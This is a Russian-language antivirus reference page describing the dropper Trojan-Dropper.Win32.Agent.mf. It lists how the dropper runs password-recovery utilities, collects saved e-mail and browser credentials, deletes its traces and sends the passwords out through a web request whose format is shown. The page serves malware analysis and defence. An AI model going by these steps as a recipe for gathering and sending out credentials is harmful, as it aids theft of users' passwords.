На главную страницу
 
 Главная 
 AVZ 
 APS 
 Статьи 
 Литература 
 Ссылки 
 Описания вирусов 
 Аппаратные системы 

AdWare/SpyWare
Backdoor
Hoax
Trojan
Trojan-Clicker
Trojan-Downloader
Trojan-Spy
Trojan-PSW
Net-Worm
Worm
Trojan-Dropper
Trojan-Proxy
Email-Worm
FraudTool
Trojan-Ransom

Поиск по сайту


Книга "Rootkits, SpyWare/AdWare, Keyloggers & BackDoors. Обнаружение и защита (+ CD-ROM)" Музыкальный проект антивирусных специалистов



Главная / Информационная безопасность / Описания вирусов / Trojan-Dropper

Trojan-Dropper.Win32.Agent.mf


Rootkit:  Нет
Видимые проявления:  Утечка паролей электронной почты и конфиденциальных данных

Размер – 121 кб, в теле исполняемого файла в незашифрованном виде хранится несколько других исполняемых файлов. В случае запуска скрытно выполняет следующие операции:
1. В текущем каталоге создает ряд исполняемых файлов с именами pwha.exe, astr.exe, im.exe
2. Запускает im.exe с параметрами “im.exe /stext im.txt”
3. Запускает pwha.exe с параметрами "pwha.exe /stext pww.txt"
4. Запускает astr.exe без параметров
5. Анализирует файлы pww.txt и im.txt. Пример файла pww.txt:

==================================================
Resource Name       : myserver.com
Resource Type       : Outlook Express
User Name/Value     :  mylogin
Password            : topsecretpwd
==================================================

==================================================
Resource Name       : IdentitiesPass
Resource Type       : Outlook Express Identity
User Name/Value     : Основное удостоверение
Password            :
==================================================


6. Уничтожает все созданные EXE файлы и текстовые файлы pww.txt и im.txt, созданные в процессе их работы, после чего завершает работу.
7. Передает найденные пароли создателям, пример передачи паролей имеет вид: <URL>/a.php?&R=myserver.com&L=mylogin&P=topsecretpwd&TY=IE. Передача паролей происходит только в случае обнаружения хотя-бы одного пароля.
Программы im.exe и pwha.exe являются утилитами для поиска паролей, pwha.exe извлекает сохраненные для WEB страниц данные автозаполнения форм и пароли, а также пароли для аккаунтов электронной почты Outlook Express. im.exe осуществляет поиск паролей Yahoo Messenger, Trillian и т.п (см. описание утилит на http://www.nirsoft.net/). astr.exe - это граббер паролей, вводимых  в полях с заменой паролей на "*"

Назад в раздел  





џндекс цитированиЯ
(С) Зайцев О.В.
2003-2016

При использовании любых материалов данного сайта необходимо указывать источник информации.